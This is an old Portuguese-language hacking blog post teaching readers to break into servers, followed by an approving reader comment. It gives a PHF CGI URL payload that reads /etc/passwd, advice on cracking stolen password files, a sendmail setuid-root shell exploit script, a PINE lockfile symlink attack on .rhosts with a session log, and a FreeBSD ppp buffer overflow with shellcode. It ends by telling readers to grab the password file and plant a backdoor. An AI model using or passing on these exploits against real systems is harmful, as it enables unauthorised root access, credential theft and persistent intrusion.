HaHacker®

News HaHacker!

Olá!

Aqui no HaHacker Nos Ofereçemos Programas Hacker

De Primeira , Derrepente Vc ta Procurando um Arquivo

Aqui vc Encontra!

Espero que Goste Do Site mais antes Leia abaixo Com Atenção!

ATENÇÃO!

Invasao eh crime Aconselhamos Você a Nao Praticar Esse Ato Porque pode acabar sendo Punido Por LEI!
E Nosso Site Nao Se Responsabiliza Pelos Seus Atos!

Obrigado!

Duvida? add O Meu MSN! Se Estiver Ao Meu Alcançe o Seu Problema Te Ajudo!

morcegao_llyncoln@hotmail.com

Se Nao Quiser Add Mande-nos um E-mail!
Sem Anexo de Software Apenas de Imagem

Nossa Comunidade No Orkut Entre e Desfrute de Dicas E Muito +

http://www.orkut.com/Community.aspx?cmm=34572409

Grato!

sexta-feira, 23 de novembro de 2007

Hack Remoto!

Hack Remoto
Pegando o Password por FTP: Bem, uma das maneiras mais fáceis de adquirir acesso de super usuário é entrando anonimo por ftp em uma página. Mas primeiro, você precisa aprender uma coisa sobre o arquivo de passwords root:User:d7Bdg:1n2HG2:1127:20:Superuser TomJones:p5Y(h0tiC:1229:20:Tom Jones,:/usr/people/tomjones:bin/csh BBob:EUyd5XAAtv2dA:112920":Billy Bob:/usr/people/bbob:bin/csh Este é um exemplo de de uma forma encriptada do arquivo de password. root:x:0:1:Superuser:/: ftp:x:202:102:Anonymous ftp:/u1/ftp ftpadmin:x:203:102:ftp Administrator:u1:ftp Este é um outro exemplos de um arquivo de password, só que este tem uma pequena diferença, ele é mais simples. Este tipo, não deixa você ver nem copiar o atual password encriptado. Isto causa problemas para o cracker e criador de dicionário(ambos esplicados depois no texto). Abaixo, esta outro exemplo de um arquivo de password: root:x:0:1:0000-Admin(0000):/:/usr/bin/csh daemon:x:1:1:0000-Admin(0000):/: bin:x:2:2:0000-Admin(0000):/usr/bin: sys:x:3:3:0000-Admin(0000):/: adm:x:4:4:0000-Admin(0000):/var/adm: lp:x:71:8:0000-lp(0000):/usr/spool/lp: smtp:x:0:0:mail daemon user:/: uucp:x:5:5:0000-uucp(0000):/usr/lib/uucp: nuucp:x:9:9:0000-uucp(0000):/var/spool/uucppublic:/usr/lib/uucp/uucico listen:x:37:4:Network Admin:/usr/net/nls: nobody:x:60001:60001:uid no body:/: noaccess:x:60002:60002:uid no access:/: webmastr:x:53:53:WWW Admin:/export/home/webmastr:/usr/bin/csh pin4geo:x:55:55:PinPaper Admin:/export/home/webmastr/new/gregY/test/pin4geo:/bin/false ftp:x:54:54:Anonymous FTP:/export/home/anon_ftp:/bin/false Estes tipos de arquivos, tem um "x" no lugar do password, ou as vezes é disfraçado de *. Agora que você sabe um pouco mais sobre o arquivo de password, você está apto para diferenciar um pass encripatdo normalmente e o "sombreado". Vamos agora caminhar para saber como crackear isso. Crackear um password não é complicado se você olhar bem, os arquivos, variam de sistema para sistema. 1. O primeiro passo a fazer, é copiar ou pegar o arquivo. 2. O segundo é procurar um Cracker e um gerador de palavras. Contudo isso é aproximadamente impossível de achar um bom cracker por que existem poucos. Eu recomendo Cracker Jack, John the Ripper, Brute Force Cracker, or Jack the Ripper. Agora, procurar por um gerador de palavras... Quando você começa a crackear um programa, você vai se perguntar para achar o password. É aí que o gerador de palavras entra. você pode fazer o download em aproximadamente TODAS as página hacker da Internet(Páginas AMERICANAS). O gerador de palavras procura por TODAS as combinações de letras que você escolher(ASCii, caps, números, etc...). 3. Você então executa o cracker e indica as direcões que ele te dá. A técnica PHF A técnica phf é o mais fácil caminho para se pegar um password(contudo não funciona em 95% das vezes). Mas para realizar a phf tudo que você precisa fazer é abrir o seu broswe e colocar o seguinte endereço: http://página_fica_aqui/cgi-bin/phf?Qalias=x%0a/bin/cat%20/etc/passwd Você vai subistituir o página_fica_aqui pelo domínio da página. Então, se você quer pegar o password de www.pagina.com você colocaria: http://www.pagina.com/cgi-bin/phf?Qalias=x%0a/bin/cat%20/etc/passwd Você precisa apenas sentar e copiar o arquivo.(se funcionar né. :P) Telnet e Exploits Bem, exploits são os melhores caminhos para hackear páginas da web, mas é muito mais complicado que Entrar por FTP e a técnica phf. Mas antes, você precisa configurar um exploit, você precisa ter um programa de telnet, existem muitos tipos de clientes, você pode procurá-lo e encontrá-lo em qualquer página de busca. Isto é melhor para pegar a conta da sua vítima(se possível). Exploits mostram erros ou bugs no sistema e normalmente avisa você para pegar a senha de root. Existem muitos exploits diferentes, e você pode ver separadamente. Eu vou listar alguns, mas existem infinitos exploits. Este exploit é agora um "Enviador de Mensagem" v.8.8.4 Ele cria um programa /tmp/x que fala shell como root. Abaixo, como faze-lo. cat << _EOF_ >/tmp/x.c #define RUN "/bin/ksh" #include main() { execl(RUN,RUN,NULL); } _EOF_ # cat << _EOF_ >/tmp/spawnfish.c main() { execl("/usr/lib/sendmail","/tmp/smtpd",0); } _EOF_ # cat << _EOF_ >/tmp/smtpd.c main() { setuid(0); setgid(0); system("chown root /tmp/x ;chmod 4755 /tmp/x"); } _EOF_ # # gcc -O -o /tmp/x /tmp/x.c gcc -O3 -o /tmp/spawnfish /tmp/spawnfish.c gcc -O3 -o /tmp/smtpd /tmp/smtpd.c # /tmp/spawnfish kill -HUP `/usr/ucb/ps -ax|grep /tmp/smtpd|grep -v grep|sed s/"[ ]*"// |cut -d" " -f1` rm /tmp/spawnfish.c /tmp/spawnfish /tmp/smtpd.c /tmp/smtpd /tmp/x.c sleep 5 if [ -u /tmp/x ] ; then echo "leet..." /tmp/x fi e agora vamos para outro exploit.eu agora vou mostrar um exploit pine atravéz do linux. Para ver o processo com ps, para ver que usuário esta rodando o PINE, um pode dar um ls no /tmp/ para pegar os nomes do lockfile para cada usuário. Olhando o procsso novamente você verá quando cada usuário sair PINE ou sair das mensagens não lidas no INBOX, efetivamente deletando o respectivo lockfile. Criando um link simbólico de /tmp/.hamors_lockfile to ~hamors/.rhosts (para um exmplo) causando o PINE a criar ~hamors/.rhostos como um arquivo 666 com o processo PINE isto é como contente. Uma simples coisa para fazer no echo "+ +" > /tmp.hamors_lockfile, then rm /tmp/.hamors_lockfile. Isto foi escrito por Sean B. Hamor. Para este exmplo, hamors é a vítima e catluvr é o "atacante": hamors (21 19:04) litterbox:~> pine catluvr (6 19:06) litterbox:~> ps -aux | grep pine catluvr 1739 0.0 1.8 100 356 pp3 S 19:07 0:00 grep pine hamors 1732 0.8 5.7 249 1104 pp2 S 19:05 0:00 pine catluvr (7 19:07) litterbox:~> ls -al /tmp/ | grep hamors - -rw-rw-rw- 1 hamors elite 4 Aug 26 19:05 .302.f5a4 catluvr (8 19:07) litterbox:~> ps -aux | grep pine catluvr 1744 0.0 1.8 100 356 pp3 S 19:08 0:00 grep pine catluvr (9 19:09) litterbox:~> ln -s /home/hamors/.rhosts /tmp/.302.f5a4 hamors (23 19:09) litterbox:~> pine catluvr (11 19:10) litterbox:~> ps -aux | grep pine catluvr 1759 0.0 1.8 100 356 pp3 S 19:11 0:00 grep pine hamors 1756 2.7 5.1 226 992 pp2 S 19:10 0:00 pine catluvr (12 19:11) litterbox:~> echo "+ +" > /tmp/.302.f5a4 catluvr (13 19:12) litterbox:~> cat /tmp/.302.f5a4 + + catluvr (14 19:12) litterbox:~> rm /tmp/.302.f5a4 catluvr (15 19:14) litterbox:~> rlogin litterbox.org -l hamors agora em outro, este é o último que vou mostrar. Scripts Exploits para o vulnerabilidade ppp é descrita por não sei, isto NÃO é uma FreeBSD-SA-96:15.Funciona no FreeBSD, foi testado. Mexa com os números se isso não funcionar. Abaixo, como configurá-lo: #include #include #include #define BUFFER_SIZE 156 /* size of the bufer to overflow */ #define OFFSET -290 /* number of bytes to jump after the start of the buffer */ long get_esp(void) { __asm__("movl %esp,%eax\n"); } main(int argc, char *argv[]) { char *buf = NULL; unsigned long *addr_ptr = NULL; char *ptr = NULL; char execshell[] = "\xeb\x23\x5e\x8d\x1e\x89\x5e\x0b\x31\xd2\x89\x56\x07\x89\x56\x0f" /* 16 bytes */ "\x89\x56\x14\x88\x56\x19\x31\xc0\xb0\x3b\x8d\x4e\x0b\x89\xca\x52" /* 16 bytes */ "\x51\x53\x50\xeb\x18\xe8\xd8\xff\xff\xff/bin/sh\x01\x01\x01\x01" /* 20 bytes */ "\x02\x02\x02\x02\x03\x03\x03\x03\x9a\x04\x04\x04\x04\x07\x04"; /* 15 bytes, 57 total */ int i,j; buf = malloc(4096); /* fill start of bufer with nops */ i = BUFFER_SIZE-strlen(execshell); memset(buf, 0x90, i); ptr = buf + i; /* place exploit code into the buffer */ for(i = 0; i < strlen(execshell); i++) *ptr++ = execshell[i]; addr_ptr = (long *)ptr; for(i=0;i < (104/4); i++) *addr_ptr++ = get_esp() + OFFSET; ptr = (char *)addr_ptr; *ptr = 0; setenv("HOME", buf, 1); execl("/usr/sbin/ppp", "ppp", NULL); } Agora quevc tem o root pegue o passwd no /etc faz um backdoor no sistema e seje feliz. :P

Um comentário:

Everardo Silva disse...

kara muito massa!!!!!!!

espero que ainda vcs continuem ensinando dessa forma!

vlwwww!